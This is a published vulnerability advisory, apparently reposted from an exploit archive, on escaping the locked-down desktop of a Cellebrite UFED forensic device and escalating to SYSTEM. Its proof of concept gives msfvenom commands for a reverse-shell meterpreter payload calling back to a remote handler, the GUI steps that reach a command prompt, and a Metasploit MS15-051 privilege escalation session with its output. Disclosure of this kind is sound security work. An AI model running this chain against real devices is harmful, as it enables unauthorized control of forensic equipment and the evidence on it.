Cellebrite UFED Desktop Escape / Privilege Escalation

Cellebrite UFED device implements local operating system policies that can be circumvented to obtain a command prompt. From there privilege escalation is possible using public exploits. Versions 5.0 through are affected.

MD5 | 328d278b40faad761a2336788c12bc32

KL-001-2020-002 : Cellebrite Restricted Desktop Escape and Escalation of User Privilege

Title: Cellebrite Restricted Desktop Escape and Escalation of User Privilege
Advisory ID: KL-001-2020-002
Publication Date: 2020.05.14
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2020-002.txt

1. Vulnerability Details

Affected Vendor: Cellebrite
Affected Product: UFED
Affected Version: 5.0 -
Platform: Embedded Windows
CWE Classification: CWE-269: Improper Privilege Management,
CWE-20: Input Validation Error
CVE ID: CVE-2020-12798

2. Vulnerability Description

Cellebrite UFED device implements local operating system
policies that can be circumvented to obtain a command
prompt. From there privilege escalation is possible using
public exploits.

3. Technical Description

The Cellebrite UFED device implements local operating system
policies which are designed to limit access to operating system
functionality. These include but may not be limited to:

1. Preventing access to dialog such as Run, File Browser,
and Explorer.


2. Preventing access to process and application management tools
such as Task Manager and the Control Panel.

These policies can be circumvented by using functionality
that is permitted by the policy governing the use of the user
desktop. A user can leverage the Wireless Network connection
string to select certificate based authentication, which then
enables file dialogs that are able to be used to launch a
command prompt. Following this, privileges can be elevated
using off the shelf and publicly available exploits relevant
to the specific Windows version in use.

4. Mitigation and Remediation Recommendation

The vendor has informed KoreLogic that this vulnerability is
not present on devices manufactured "at least since 2018." The
vendor was uncertain of the exact version number that remediated
this attack vector.

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.

6. Disclosure Timeline

2020.03.05 - KoreLogic submits vulnerability details to
2020.03.17 - Cellebrite acknowledges receipt and the intention
to investigate.
2020.04.16 - KoreLogic requests an update on the status of the
vulnerability report.
2020.04.19 - Cellebrite responds, notifying KoreLogic that the
vulnerable dialog is not available on newer UFED
releases. Indicates they will determine when the
remediation was introduced.
2020.05.04 - KoreLogic requests an update from Cellebrite.
2020.05.05 - Cellebrite responds that they do not have the
version number at hand, but does not request
delaying public disclosure.
2020.05.11 - MITRE issues CVE-2020-12798.
2020.05.12 - 45 business-days have elapsed since the report was
submitted to Cellebrite.
2020.05.14 - KoreLogic public disclosure.

7. Proof of Concept

Begin by using the msfvenom binary to create a meterpreter
payload that will initiate a remote connection to a C2. Copy
the payload to a USB drive. Following this, use the msfconsole
binary to create a C2 connection handler with the multi/handler

$ msfvenom -p windows/meterpreter/reverse_tcp -f exe -o payload.exe LHOST=[REDACTED] LPORT=8888
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: payload.exe
$ sudo mount -o rw /dev/sda1 a/
$ sudo cp payload.exe a/
$ sync
$ sudo umount a/
$ msfconsole
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST [REDACTED] yes The listen address (an interface may be specified)
LPORT 8888 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target

msf5 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on [REDACTED]:8888

Now insert the USB drive where payload.exe resides into a
target Cellebrite device. Next, follow the steps below:

1. Open the Wireless Network Connection screen by clicking
on the WiFi icon in the bottom right hand corner of the
screen. This should be next to the system clock.

2. Select "Change advanced settings" -- this will bring up a
screen called Windows Network Connection Properties. Choose
the Wireless Networks tab.

3. Under the Preferred networks section, click the Add button
and then select the Authentication tab. Make sure "Enable IEEE
802.1x authentication for this network" is enabled.

4. Under EAP Type, select "Smart Card or other Certificate"
and then click the Properties button.

5. Under Trusted Root Certificate Authorities click the
View Certificate button. This will bring up a screen called
Certificate, choose the Details tab and click the "Copy to
File" button. This will bring up a screen called Certificate
Export Wizard.

6. Click Next and select any of the available export format
options. For example, choose the "DER encoded binary X.509"
option and click next.

7. Instead of typing out a export path click the Browse
button to open a file dialog. In the "File Name" box type:
\WINDOWS\System32\ and under "Save as type" select the "All
Files (*.*)" option. Hit the enter key.

8. Locate the cmd.exe file then drag and drop any DLL over
it. For example, choose the clusapi.dll file located near the
cmd.exe executable. This will open a Command Prompt screen as
an unprivileged user.

9. Type the drive letter to change into the USB drive containing
the payload.exe file.


This results in a connection back into Metasploit.

[*] Sending stage (180291 bytes) to [REDACTED]
[*] Meterpreter session 2 opened ([REDACTED]:8888 -> [REDACTED]:1041) at 2020-01-29 11:41:05 -0800
msf5 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: TOUCH-[REDACTED]\Operator

An exploit for CVE-2015-1701 is loaded up and configured to run
a local privilege escalation exploit against the unprivileged
session and SYSTEM is obtained.

msf5 exploit(windows/local/ms15_051_client_copy_image) > show options

Module options (exploit/windows/local/ms15_051_client_copy_image):

Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.

Exploit target:

Id Name
-- ----
0 Windows x86

msf5 exploit(windows/local/ms15_051_client_copy_image) > set SESSION 2
msf5 exploit(windows/local/ms15_051_client_copy_image) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms15_051_client_copy_image) > set LPORT 8888
LPORT => 8888
msf5 exploit(windows/local/ms15_051_client_copy_image) > set LHOST [REDACTED]
msf5 exploit(windows/local/ms15_051_client_copy_image) > run

[*] Started reverse TCP handler on [REDACTED]:8888
[*] Launching notepad to host the exploit...
[+] Process 3936 launched.
[*] Reflectively injecting the exploit DLL into 3936...
[*] Injecting exploit into 3936...
[*] Exploit injected. Injecting payload into 3936...
[*] Payload injected. Executing exploit...
[*] Sending stage (180291 bytes) to [REDACTED]
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 3 opened ([REDACTED]:8888 -> [REDACTED]:1045) at 2020-01-29 11:48:15 -0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

The contents of this advisory are copyright(c) 2020
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.

Our public vulnerability disclosure policy is available at:

Related Posts